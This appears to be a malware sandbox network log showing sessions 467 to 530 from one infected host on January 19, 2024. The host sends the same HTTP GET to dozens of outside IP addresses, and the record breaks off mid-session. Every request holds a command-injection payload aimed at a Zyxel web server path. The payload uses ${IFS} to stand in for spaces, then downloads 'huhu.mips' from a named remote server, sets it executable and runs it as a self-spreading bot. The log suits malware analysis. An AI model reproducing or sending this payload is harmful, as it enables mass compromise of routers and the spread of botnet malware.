                                      Jan 19, 2024 17:29:10.395412922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      467192.168.2.1447622167.181.227.191443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:10.395431995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      468192.168.2.1459944137.172.24.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:10.395489931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      469192.168.2.1439954209.183.179.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:10.395518064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      470192.168.2.143330019.229.146.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:10.395564079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      471192.168.2.1444702119.167.124.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:10.395603895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      472192.168.2.1453254179.123.253.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:10.395662069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      473192.168.2.145190490.236.14.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:10.395684958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      474192.168.2.1447924177.26.25.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:10.395734072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      475192.168.2.1458168200.135.252.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:10.395768881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      476192.168.2.1445920151.144.95.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:10.395795107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      477192.168.2.1451882202.87.49.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:10.395853996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      478192.168.2.1455122168.149.158.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:10.395880938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      479192.168.2.1449104175.143.183.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:10.395941019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      480192.168.2.144086898.37.183.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.401631117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      481192.168.2.1436680206.138.237.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.401685953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      482192.168.2.143779853.38.35.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.401736975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      483192.168.2.1436810151.82.189.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.401797056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      484192.168.2.143568067.175.17.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.401845932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      485192.168.2.1452862119.204.31.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.401896000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      486192.168.2.145398265.96.111.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.401937962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      487192.168.2.1457916185.112.208.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.401973009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      488192.168.2.1433642114.41.185.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402050972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      489192.168.2.1439242199.26.74.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402067900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      490192.168.2.1447068130.175.162.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402172089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      491192.168.2.145876631.102.159.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402216911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      492192.168.2.143496448.55.140.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402251005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      493192.168.2.144732034.124.0.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402261019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      494192.168.2.1438654118.83.102.53443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402342081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      495192.168.2.145744419.140.125.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402378082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      496192.168.2.1447120107.121.79.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402434111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      497192.168.2.1452206142.235.104.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402487993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      498192.168.2.1447858206.221.35.186443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402559996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      499192.168.2.1447304104.44.48.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402601957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      500192.168.2.1451200155.251.180.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402667999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      501192.168.2.143896269.202.72.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402700901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      502192.168.2.1459972134.147.17.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402791023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      503192.168.2.1455606204.65.117.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402852058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      504192.168.2.143720235.64.6.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402925968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      505192.168.2.145625873.135.71.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.402955055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      506192.168.2.1435392211.210.210.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.403018951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      507192.168.2.1437936118.128.185.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.403060913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      508192.168.2.1450262112.54.163.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.403104067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      509192.168.2.1446816201.206.146.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.403151989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      510192.168.2.143712624.92.136.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.403188944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      511192.168.2.1455538140.161.56.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.403229952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      512192.168.2.1433630220.106.46.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.403285980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      513192.168.2.143780885.94.191.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:11.403341055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      514192.168.2.145319220.127.10.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:13.412849903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      515192.168.2.1432964170.55.247.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:13.412892103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      516192.168.2.1443484102.37.8.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:13.412924051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      517192.168.2.1451964120.117.150.220443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:13.413037062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      518192.168.2.1451688156.249.70.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:14.416119099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      519192.168.2.14425948.30.247.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:14.416177034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      520192.168.2.1442732131.47.206.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:14.416277885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      521192.168.2.1439268222.190.235.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:15.420686960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      522192.168.2.14553924.121.224.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:15.420730114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      523192.168.2.144218059.131.254.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:15.420757055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      524192.168.2.1446086205.125.160.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:15.420814991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      525192.168.2.1438228184.225.190.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:15.420847893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      526192.168.2.144093278.94.64.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:15.420885086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      527192.168.2.145089620.230.192.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:16.424325943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      528192.168.2.1451412183.25.157.131443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:16.424355030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      529192.168.2.1454638162.57.135.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:16.424388885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      530192.168.2.1449468118.130.97.180443
                                      TimestampBytes transferredDirectionData
